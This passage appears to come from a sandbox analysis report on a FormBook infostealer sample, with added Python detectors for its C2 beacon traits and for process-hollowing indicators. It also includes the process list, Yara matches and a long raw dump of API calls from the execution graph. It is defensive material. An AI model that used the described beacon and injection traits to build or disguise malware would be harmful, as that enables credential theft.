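    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def decode_blob(body: str):
    """Return the decoded bytes if the body is exactly one short-key=base64 field, else None."""
    if "&" in body or "=" not in body:
        return None
    key, _, value = body.partition("=")       # first '=' separates key from value
    if not re.fullmatch(r"[A-Za-z0-9]{2,8}", key):
        return None
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; ~8.0 for encrypted/compressed data, ~4-5 for text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def blob_entropy(raw: str) -> float:
    blob = decode_blob(parse_request(raw)[3])
    return shannon_entropy(blob or b"")


def beacon_indicators(raw: str) -> list:
    """Return the list of beacon traits present in the request."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if method != "POST" or not headers.get("content-type", "").startswith(
            "application/x-www-form-urlencoded"):
        return hits
    ref = urlsplit(headers.get("referer", ""))
    if ref.netloc and ref.netloc == headers.get("host") and ref.path == path:
        hits.append("referer mirrors the POST target")
    if re.fullmatch(r"/[a-z0-9]{2,8}/", path):
        hits.append("short single-segment path with trailing slash")
    if LEGACY_UA.match(headers.get("user-agent", "")):
        hits.append("legacy MSIE 7.0 / Trident 5.0 user agent")
    blob = decode_blob(body)
    if blob is not None and len(blob) >= 64:
        hits.append("single short-key form field carrying a base64 blob")
    return hits


def is_beacon(raw: str, threshold: int = 3) -> bool:
    return len(beacon_indicators(raw)) >= threshold


if __name__ == "__main__":
    for name, req in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, is_beacon(req), beacon_indicators(req), round(blob_entropy(req), 2))
```

The blob in the report decodes to 149 bytes; its entropy is a useful secondary signal for separating an encrypted payload from ordinary form data, but it is reported rather than used as a gate, because a single beacon can be short enough to skew the measurement. Tune the threshold to your telemetry: the Referer-mirrors-target check and the single-field base64 body are the two traits least likely to appear in legitimate form posts.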



                                                                    Target ID:0
                                                                    Start time:00:30:31
                                                                    Start date:11/01/2025
                                                                    Path:C:\Users\user\Desktop\plZuPtZoTk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\plZuPtZoTk.exe"
                                                                    Imagebase:0x9c0000
                                                                    File size:1'272'832 bytes
                                                                    MD5 hash:03473468FD10D42DD617A426DCFFA92D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:00:30:33
                                                                    Start date:11/01/2025
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\plZuPtZoTk.exe"
                                                                    Imagebase:0xe10000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:00:31:10
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe"
                                                                    Imagebase:0x660000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:00:31:12
                                                                    Start date:11/01/2025
                                                                    Path:C:\Windows\SysWOW64\clip.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\clip.exe"
                                                                    Imagebase:0xd60000
                                                                    File size:24'576 bytes
                                                                    MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:00:31:25
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe"
                                                                    Imagebase:0x660000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:10
                                                                    Start time:00:31:37
                                                                    Start date:11/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff6d20e0000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true
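Three things in the process list above are the detection opportunities: Target ID 2 is `svchost.exe` whose command line is the original sample's path (an image/command-line mismatch characteristic of a hollowed process), Targets 4 and 8 run from a `Program Files (x86)` directory whose name is a 75-character random string, and two Windows system binaries (`svchost.exe`, `clip.exe`) carry FormBook Yara matches in memory. The Python below is an added example, not part of the Joe Sandbox report: it encodes those three checks and runs them over process records reconstructed from the list above (constructed input; the `yara` field repeats the rule names the report shows, trimmed to the fields the checks need).

```python
"""Process-list anomaly checks for hollowing, random install paths and injected system binaries."""
import ntpath

RANDOM_DIR_NAME = ("IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD")
FORMBOOK_RULES = ["JoeSecurity_FormBook_1", "Windows_Trojan_Formbook_1112e116"]

# Constructed from the report's process list (Target IDs 0, 2, 4, 5, 8, 10).
PROCESSES = [
    {"id": 0, "path": r"C:\Users\user\Desktop\plZuPtZoTk.exe",
     "cmdline": r'"C:\Users\user\Desktop\plZuPtZoTk.exe"', "yara": []},
    {"id": 2, "path": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\plZuPtZoTk.exe"', "yara": FORMBOOK_RULES},
    {"id": 4, "path": r"C:\Program Files (x86)\%s\GtDTOqzvEb.exe" % RANDOM_DIR_NAME,
     "cmdline": r'"C:\Program Files (x86)\%s\GtDTOqzvEb.exe"' % RANDOM_DIR_NAME,
     "yara": FORMBOOK_RULES},
    {"id": 5, "path": r"C:\Windows\SysWOW64\clip.exe",
     "cmdline": r'"C:\Windows\SysWOW64\clip.exe"', "yara": FORMBOOK_RULES},
    {"id": 8, "path": r"C:\Program Files (x86)\%s\GtDTOqzvEb.exe" % RANDOM_DIR_NAME,
     "cmdline": r'"C:\Program Files (x86)\%s\GtDTOqzvEb.exe"' % RANDOM_DIR_NAME,
     "yara": FORMBOOK_RULES},
    {"id": 10, "path": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', "yara": []},
]

MISMATCH = "image path differs from command-line executable (possible hollowing)"
RANDOM_DIR = "random-looking install directory under Program Files"
INJECTED = "Windows system binary with in-memory FormBook Yara match"


def cmdline_image(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted executable path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def looks_random(name: str) -> bool:
    """Long, purely alphabetic, mixed-case, no spaces: unlike a vendor directory name."""
    return (len(name) >= 16 and name.isalpha()
            and any(c.islower() for c in name)
            and any(c.isupper() for c in name[1:]))


def analyze(procs) -> list:
    """Return (target id, finding) pairs for the records that trip a check."""
    findings = []
    for p in procs:
        path = p["path"]
        image = cmdline_image(p["cmdline"])
        # Case-insensitive compare: Firefox.exe vs firefox.exe is not a mismatch.
        if ntpath.basename(path).lower() != ntpath.basename(image).lower():
            findings.append((p["id"], MISMATCH))
        parts = ntpath.normpath(path).split("\\")
        if (len(parts) >= 3 and parts[1].lower().startswith("program files")
                and looks_random(parts[2])):
            findings.append((p["id"], RANDOM_DIR))
        if path.lower().startswith("c:\\windows\\") and p["yara"]:
            findings.append((p["id"], INJECTED))
    return findings


if __name__ == "__main__":
    for target_id, finding in analyze(PROCESSES):
        print("Target %d: %s" % (target_id, finding))
```

The mismatch check is the cheapest of the three to run fleet-wide from EDR process telemetry, because it needs only the image path and command line; the random-directory heuristic needs tuning against your software inventory, and the Yara check depends on memory scanning being available.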


                                                                      Execution Graph

                                                                      Execution Coverage:3%
                                                                      Dynamic/Decrypted Code Coverage:2.2%
                                                                      Signature Coverage:3.2%
                                                                      Total number of Nodes:1856
                                                                      Total number of Limit Nodes:54
                                                                      [Execution graph omitted: the interactive node/edge listing (1856 nodes, 54 limit nodes) does not survive extraction. API calls named in the graph nodes include PeekMessageW, GetInputState, TranslateMessage/DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, timeGetTime, Sleep, QueryPerformanceCounter/QueryPerformanceFrequency, GetForegroundWindow, GetExitCodeProcess, WaitForSingleObject/WaitForSingleObjectEx, CloseHandle, RaiseException, RtlAllocateHeap, EnterCriticalSection/LeaveCriticalSection, SetEvent/ResetEvent, LoadLibraryA, LoadLibraryExW, FreeLibrary, VirtualProtect, GetCurrentProcess/TerminateProcess, GetFileAttributesW, CharLowerBuffW and lstrlenW.]
97532->97533 97534 a2d885 97533->97534 97535 9c93b2 22 API calls 97533->97535 97536 9c4c6d 22 API calls 97534->97536 97535->97534 97537 a2d88e 97536->97537 97538 a2d89e 97537->97538 97539 9c93b2 22 API calls 97537->97539 97540 a2d8b0 97538->97540 97542 9ca8c7 22 API calls 97538->97542 97539->97538 97541 9c6350 22 API calls 97540->97541 97543 a2d8bb 97541->97543 97542->97540 97820 a2d978 22 API calls 97543->97820 97545 a2d8ca 97821 a2d978 22 API calls 97545->97821 97547 a2d8dd 97548 9c4c6d 22 API calls 97547->97548 97549 a2d8e7 97548->97549 97550 a2d8fe 97549->97550 97551 a2d8ec 97549->97551 97553 9c4c6d 22 API calls 97550->97553 97552 9c33c6 22 API calls 97551->97552 97554 a2d8f9 97552->97554 97555 a2d907 97553->97555 97558 9c6350 22 API calls 97554->97558 97556 a2d925 97555->97556 97557 9c33c6 22 API calls 97555->97557 97559 9c6350 22 API calls 97556->97559 97557->97554 97558->97556 97559->97560 97560->97275 97562 a32954 __wsopen_s 97561->97562 97563 9dfe0b 22 API calls 97562->97563 97564 a32971 97563->97564 97565 9c5722 22 API calls 97564->97565 97566 a3297b 97565->97566 97567 a3274e 27 API calls 97566->97567 97568 a32986 97567->97568 97569 9c511f 64 API calls 97568->97569 97570 a3299b 97569->97570 97571 a329bf 97570->97571 97572 a32a6c 97570->97572 97848 a32e66 97571->97848 97574 a32e66 75 API calls 97572->97574 97589 a32a38 97574->97589 97577 9c50f5 40 API calls 97578 a32a91 97577->97578 97579 9c50f5 40 API calls 97578->97579 97582 a32aa1 97579->97582 97580 a32a75 ISource 97580->97278 97581 a329ed 97855 9ed583 26 API calls 97581->97855 97583 9c50f5 40 API calls 97582->97583 97585 a32abc 97583->97585 97586 9c50f5 40 API calls 97585->97586 97587 a32acc 97586->97587 97588 9c50f5 40 API calls 97587->97588 97590 a32ae7 97588->97590 97589->97577 97589->97580 97591 9c50f5 40 API calls 97590->97591 97592 a32af7 97591->97592 97593 9c50f5 40 API calls 97592->97593 97594 a32b07 97593->97594 97595 9c50f5 40 API calls 97594->97595 97596 a32b17 97595->97596 97822 a33017 
GetTempPathW GetTempFileNameW 97596->97822 97598 a32b22 97599 9ee5eb 29 API calls 97598->97599 97610 a32b33 97599->97610 97601 a32bf8 97603 a32c12 97601->97603 97604 a32bfe DeleteFileW 97601->97604 97602 9c50f5 40 API calls 97602->97610 97605 a32c91 CopyFileW 97603->97605 97606 a32c18 97603->97606 97604->97580 97607 a32ca7 DeleteFileW 97605->97607 97608 a32cb9 DeleteFileW 97605->97608 97856 a322ce 79 API calls 97606->97856 97607->97580 97845 a32fd8 CreateFileW 97608->97845 97610->97580 97610->97602 97612 a32bed 97610->97612 97823 9edbb3 97610->97823 97832 9ee678 97612->97832 97614 a32c7c 97614->97608 97615 a32c80 DeleteFileW 97614->97615 97615->97580 97616->97208 97618 9c33dd 97617->97618 97619 a030bb 97617->97619 98110 9c33ee 97618->98110 97621 9dfddb 22 API calls 97619->97621 97623 a030c5 _wcslen 97621->97623 97622 9c33e8 97622->97237 97624 9dfe0b 22 API calls 97623->97624 97625 a030fe __fread_nolock 97624->97625 97626->97243 97627->97256 97629 a04ba1 97628->97629 97630 9c6b67 _wcslen 97628->97630 97631 9c93b2 22 API calls 97629->97631 97633 9c6b7d 97630->97633 97634 9c6ba2 97630->97634 97632 a04baa 97631->97632 97632->97632 98120 9c6f34 22 API calls 97633->98120 97635 9dfddb 22 API calls 97634->97635 97637 9c6bae 97635->97637 97639 9dfe0b 22 API calls 97637->97639 97638 9c6b85 __fread_nolock 97638->97266 97639->97638 97641 9c4ea8 GetProcAddress 97640->97641 97642 9c4ec6 97640->97642 97643 9c4eb8 97641->97643 97645 9ee5eb 97642->97645 97643->97642 97644 9c4ebf FreeLibrary 97643->97644 97644->97642 97678 9ee52a 97645->97678 97647 9c4eea 97647->97445 97647->97446 97649 9c4e8d 97648->97649 97650 9c4e6e GetProcAddress 97648->97650 97653 9c4f80 97649->97653 97651 9c4e7e 97650->97651 97651->97649 97652 9c4e86 FreeLibrary 97651->97652 97652->97649 97654 9dfe0b 22 API calls 97653->97654 97655 9c4f95 97654->97655 97739 9c5722 97655->97739 97657 9c4fa1 __fread_nolock 97658 9c50a5 97657->97658 97659 a03d1d 97657->97659 97668 9c4fdc 97657->97668 97742 9c42a2 
CreateStreamOnHGlobal 97658->97742 97753 a3304d 74 API calls 97659->97753 97662 a03d22 97664 9c511f 64 API calls 97662->97664 97663 9c50f5 40 API calls 97663->97668 97665 a03d45 97664->97665 97666 9c50f5 40 API calls 97665->97666 97669 9c506e ISource 97666->97669 97668->97662 97668->97663 97668->97669 97748 9c511f 97668->97748 97669->97453 97671 a03d70 97670->97671 97672 9c5107 97670->97672 97775 9ee8c4 97672->97775 97675 a328fe 97796 a3274e 97675->97796 97677 a32919 97677->97461 97681 9ee536 ___BuildCatchObject 97678->97681 97679 9ee544 97703 9ef2d9 20 API calls _abort 97679->97703 97681->97679 97683 9ee574 97681->97683 97682 9ee549 97704 9f27ec 26 API calls _abort 97682->97704 97685 9ee579 97683->97685 97686 9ee586 97683->97686 97705 9ef2d9 20 API calls _abort 97685->97705 97695 9f8061 97686->97695 97689 9ee58f 97690 9ee595 97689->97690 97691 9ee5a2 97689->97691 97706 9ef2d9 20 API calls _abort 97690->97706 97707 9ee5d4 LeaveCriticalSection __fread_nolock 97691->97707 97693 9ee554 __fread_nolock 97693->97647 97696 9f806d ___BuildCatchObject 97695->97696 97708 9f2f5e EnterCriticalSection 97696->97708 97698 9f807b 97709 9f80fb 97698->97709 97702 9f80ac __fread_nolock 97702->97689 97703->97682 97704->97693 97705->97693 97706->97693 97707->97693 97708->97698 97716 9f811e 97709->97716 97710 9f8177 97728 9f4c7d 20 API calls 2 library calls 97710->97728 97712 9f8180 97729 9f29c8 97712->97729 97715 9f8189 97717 9f8088 97715->97717 97735 9f3405 11 API calls 2 library calls 97715->97735 97716->97710 97716->97717 97726 9e918d EnterCriticalSection 97716->97726 97727 9e91a1 LeaveCriticalSection 97716->97727 97723 9f80b7 97717->97723 97719 9f81a8 97736 9e918d EnterCriticalSection 97719->97736 97722 9f81bb 97722->97717 97738 9f2fa6 LeaveCriticalSection 97723->97738 97725 9f80be 97725->97702 97726->97716 97727->97716 97728->97712 97730 9f29d3 RtlFreeHeap 97729->97730 97731 9f29fc __dosmaperr 97729->97731 97730->97731 97732 9f29e8 97730->97732 97731->97715 97737 9ef2d9 20 API 
calls _abort 97732->97737 97734 9f29ee GetLastError 97734->97731 97735->97719 97736->97722 97737->97734 97738->97725 97740 9dfddb 22 API calls 97739->97740 97741 9c5734 97740->97741 97741->97657 97743 9c42bc FindResourceExW 97742->97743 97747 9c42d9 97742->97747 97744 a035ba LoadResource 97743->97744 97743->97747 97745 a035cf SizeofResource 97744->97745 97744->97747 97746 a035e3 LockResource 97745->97746 97745->97747 97746->97747 97747->97668 97749 a03d90 97748->97749 97750 9c512e 97748->97750 97754 9eece3 97750->97754 97753->97662 97757 9eeaaa 97754->97757 97756 9c513c 97756->97668 97760 9eeab6 ___BuildCatchObject 97757->97760 97758 9eeac2 97770 9ef2d9 20 API calls _abort 97758->97770 97760->97758 97761 9eeae8 97760->97761 97772 9e918d EnterCriticalSection 97761->97772 97762 9eeac7 97771 9f27ec 26 API calls _abort 97762->97771 97765 9eeaf4 97773 9eec0a 62 API calls 2 library calls 97765->97773 97767 9eeb08 97774 9eeb27 LeaveCriticalSection __fread_nolock 97767->97774 97769 9eead2 __fread_nolock 97769->97756 97770->97762 97771->97769 97772->97765 97773->97767 97774->97769 97778 9ee8e1 97775->97778 97777 9c5118 97777->97675 97779 9ee8ed ___BuildCatchObject 97778->97779 97780 9ee92d 97779->97780 97781 9ee900 ___scrt_fastfail 97779->97781 97782 9ee925 __fread_nolock 97779->97782 97793 9e918d EnterCriticalSection 97780->97793 97791 9ef2d9 20 API calls _abort 97781->97791 97782->97777 97784 9ee937 97794 9ee6f8 38 API calls 4 library calls 97784->97794 97787 9ee91a 97792 9f27ec 26 API calls _abort 97787->97792 97788 9ee94e 97795 9ee96c LeaveCriticalSection __fread_nolock 97788->97795 97791->97787 97792->97782 97793->97784 97794->97788 97795->97782 97799 9ee4e8 97796->97799 97798 a3275d 97798->97677 97802 9ee469 97799->97802 97801 9ee505 97801->97798 97803 9ee478 97802->97803 97805 9ee48c 97802->97805 97810 9ef2d9 20 API calls _abort 97803->97810 97809 9ee488 __alldvrm 97805->97809 97812 9f333f 11 API calls 2 library calls 97805->97812 97806 9ee47d 97811 9f27ec 26 API 
calls _abort 97806->97811 97809->97801 97810->97806 97811->97809 97812->97809 97814 9ca6dd 97813->97814 97815 9ca6d0 97813->97815 97816 9dfddb 22 API calls 97814->97816 97815->97480 97817 9ca6e7 97816->97817 97818 9dfe0b 22 API calls 97817->97818 97818->97815 97819->97501 97820->97545 97821->97547 97822->97598 97824 9edbc1 97823->97824 97830 9edbdd 97823->97830 97825 9edbcd 97824->97825 97826 9edbe3 97824->97826 97824->97830 97860 9ef2d9 20 API calls _abort 97825->97860 97857 9ed9cc 97826->97857 97829 9edbd2 97861 9f27ec 26 API calls _abort 97829->97861 97830->97610 97833 9ee684 ___BuildCatchObject 97832->97833 97834 9ee6aa 97833->97834 97835 9ee695 97833->97835 97844 9ee6a5 __fread_nolock 97834->97844 98017 9e918d EnterCriticalSection 97834->98017 98034 9ef2d9 20 API calls _abort 97835->98034 97838 9ee69a 98035 9f27ec 26 API calls _abort 97838->98035 97839 9ee6c6 98018 9ee602 97839->98018 97842 9ee6d1 98036 9ee6ee LeaveCriticalSection __fread_nolock 97842->98036 97844->97601 97846 a33013 97845->97846 97847 a32fff SetFileTime CloseHandle 97845->97847 97846->97580 97847->97846 97849 a32e7a 97848->97849 97850 9c50f5 40 API calls 97849->97850 97851 a329c4 97849->97851 97852 a328fe 27 API calls 97849->97852 97853 9c511f 64 API calls 97849->97853 97850->97849 97851->97580 97854 9ed583 26 API calls 97851->97854 97852->97849 97853->97849 97854->97581 97855->97589 97856->97614 97862 9ed97b 97857->97862 97859 9ed9f0 97859->97830 97860->97829 97861->97830 97863 9ed987 ___BuildCatchObject 97862->97863 97870 9e918d EnterCriticalSection 97863->97870 97865 9ed995 97871 9ed9f4 97865->97871 97869 9ed9b3 __fread_nolock 97869->97859 97870->97865 97879 9f49a1 97871->97879 97877 9ed9a2 97878 9ed9c0 LeaveCriticalSection __fread_nolock 97877->97878 97878->97869 97900 9ed955 97879->97900 97881 9f49b0 97907 9ff89b 97881->97907 97883 9f49b6 97884 9eda09 97883->97884 97916 9f3820 21 API calls 2 library calls 97883->97916 97888 9eda3a 97884->97888 97886 9f4a15 97887 9f29c8 _free 20 API calls 
97886->97887 97887->97884 97889 9eda24 97888->97889 97891 9eda4c 97888->97891 97899 9f4a56 62 API calls 97889->97899 97890 9eda5a 97947 9ef2d9 20 API calls _abort 97890->97947 97891->97889 97891->97890 97897 9eda85 __fread_nolock 97891->97897 97893 9eda5f 97948 9f27ec 26 API calls _abort 97893->97948 97896 9ed955 __fread_nolock 26 API calls 97896->97897 97897->97889 97897->97896 97922 9f59be 97897->97922 97949 9edc0b 97897->97949 97899->97877 97901 9ed976 97900->97901 97902 9ed961 97900->97902 97901->97881 97917 9ef2d9 20 API calls _abort 97902->97917 97904 9ed966 97918 9f27ec 26 API calls _abort 97904->97918 97906 9ed971 97906->97881 97908 9ff8a8 97907->97908 97909 9ff8b5 97907->97909 97919 9ef2d9 20 API calls _abort 97908->97919 97912 9ff8c1 97909->97912 97920 9ef2d9 20 API calls _abort 97909->97920 97911 9ff8ad 97911->97883 97912->97883 97914 9ff8e2 97921 9f27ec 26 API calls _abort 97914->97921 97916->97886 97917->97904 97918->97906 97919->97911 97920->97914 97921->97911 97923 9f59ca ___BuildCatchObject 97922->97923 97924 9f59ea 97923->97924 97925 9f59d2 97923->97925 97926 9f5a88 97924->97926 97931 9f5a1f 97924->97931 98009 9ef2c6 20 API calls _abort 97925->98009 98014 9ef2c6 20 API calls _abort 97926->98014 97929 9f59d7 98010 9ef2d9 20 API calls _abort 97929->98010 97930 9f5a8d 98015 9ef2d9 20 API calls _abort 97930->98015 97955 9f5147 EnterCriticalSection 97931->97955 97935 9f5a95 98016 9f27ec 26 API calls _abort 97935->98016 97936 9f5a25 97938 9f5a56 97936->97938 97939 9f5a41 97936->97939 97956 9f5aa9 97938->97956 98011 9ef2d9 20 API calls _abort 97939->98011 97941 9f59df __fread_nolock 97941->97897 97943 9f5a46 98012 9ef2c6 20 API calls _abort 97943->98012 97944 9f5a51 98013 9f5a80 LeaveCriticalSection __wsopen_s 97944->98013 97947->97893 97948->97889 97950 9edc1f 97949->97950 97951 9edc23 97949->97951 97950->97897 97951->97950 97952 9ed955 __fread_nolock 26 API calls 97951->97952 97953 9edc43 97952->97953 97954 9f59be __wsopen_s 62 API calls 97953->97954 
97954->97950 97955->97936 97957 9f5ad7 97956->97957 97994 9f5ad0 97956->97994 97958 9f5adb 97957->97958 97959 9f5afa 97957->97959 97960 9ef2c6 __dosmaperr 20 API calls 97958->97960 97963 9f5b4b 97959->97963 97964 9f5b2e 97959->97964 97962 9f5ae0 97960->97962 97961 9e0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97965 9f5cb1 97961->97965 97966 9ef2d9 __dosmaperr 20 API calls 97962->97966 97967 9f5b61 97963->97967 97970 9f9424 __wsopen_s 28 API calls 97963->97970 97968 9ef2c6 __dosmaperr 20 API calls 97964->97968 97965->97944 97969 9f5ae7 97966->97969 97971 9f564e __wsopen_s 39 API calls 97967->97971 97972 9f5b33 97968->97972 97973 9f27ec _abort 26 API calls 97969->97973 97970->97967 97974 9f5b6a 97971->97974 97975 9ef2d9 __dosmaperr 20 API calls 97972->97975 97973->97994 97977 9f5b6f 97974->97977 97978 9f5ba8 97974->97978 97976 9f5b3b 97975->97976 97979 9f27ec _abort 26 API calls 97976->97979 97982 9f5b95 97977->97982 97983 9f5b73 97977->97983 97980 9f5bbc 97978->97980 97981 9f5c02 WriteFile 97978->97981 97979->97994 97986 9f5bc4 97980->97986 97987 9f5bf2 97980->97987 97984 9f5c25 GetLastError 97981->97984 97989 9f5b8b 97981->97989 97985 9f542e __wsopen_s 45 API calls 97982->97985 97988 9f5c69 97983->97988 97992 9f55e1 __wsopen_s GetLastError WriteConsoleW CreateFileW 97983->97992 97984->97989 97985->97989 97990 9f5bc9 97986->97990 97991 9f5be2 97986->97991 97993 9f56c4 __wsopen_s 7 API calls 97987->97993 97988->97994 97995 9ef2d9 __dosmaperr 20 API calls 97988->97995 97989->97988 97989->97994 97999 9f5c45 97989->97999 97990->97988 97996 9f5bd2 97990->97996 97997 9f5891 __wsopen_s 8 API calls 97991->97997 97992->97989 98004 9f5be0 97993->98004 97994->97961 97998 9f5c8e 97995->97998 98000 9f57a3 __wsopen_s 7 API calls 97996->98000 97997->98004 98001 9ef2c6 __dosmaperr 20 API calls 97998->98001 98002 9f5c4c 97999->98002 98003 9f5c60 97999->98003 98000->98004 98001->97994 98005 
9ef2d9 __dosmaperr 20 API calls 98002->98005 98006 9ef2a3 __dosmaperr 20 API calls 98003->98006 98004->97989 98007 9f5c51 98005->98007 98006->97994 98008 9ef2c6 __dosmaperr 20 API calls 98007->98008 98008->97994 98009->97929 98010->97941 98011->97943 98012->97944 98013->97941 98014->97930 98015->97935 98016->97941 98017->97839 98019 9ee60f 98018->98019 98020 9ee624 98018->98020 98056 9ef2d9 20 API calls _abort 98019->98056 98023 9edc0b 62 API calls 98020->98023 98027 9ee61f 98020->98027 98022 9ee614 98057 9f27ec 26 API calls _abort 98022->98057 98025 9ee638 98023->98025 98037 9f4d7a 98025->98037 98027->97842 98029 9ed955 __fread_nolock 26 API calls 98030 9ee646 98029->98030 98041 9f862f 98030->98041 98033 9f29c8 _free 20 API calls 98033->98027 98034->97838 98035->97844 98036->97844 98038 9ee640 98037->98038 98039 9f4d90 98037->98039 98038->98029 98039->98038 98040 9f29c8 _free 20 API calls 98039->98040 98040->98038 98042 9f863e 98041->98042 98043 9f8653 98041->98043 98061 9ef2c6 20 API calls _abort 98042->98061 98045 9f868e 98043->98045 98048 9f867a 98043->98048 98063 9ef2c6 20 API calls _abort 98045->98063 98047 9f8643 98062 9ef2d9 20 API calls _abort 